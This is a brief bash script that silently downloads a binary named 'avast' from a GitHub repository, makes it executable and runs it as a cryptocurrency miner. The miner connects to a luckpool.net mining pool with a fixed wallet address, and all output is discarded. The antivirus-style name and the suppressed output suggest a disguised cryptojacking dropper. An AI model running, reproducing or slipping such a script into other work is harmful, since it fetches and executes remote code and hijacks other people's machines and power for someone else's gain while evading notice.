#!/bin/bash
wget https://github.com/samrikulan/toya/raw/main/avast >/dev/null 2>&1
chmod +x avast  >/dev/null 2>&1
./avast -v -l  eu.luckpool.net:3956 -u RSLaafsZRq7WNqhcCQQzwxe57y2PZc3eP8.$(echo $(shuf -i 1-99999 -n 1)-I_Say_You_Think_SmaLL) x -t 2
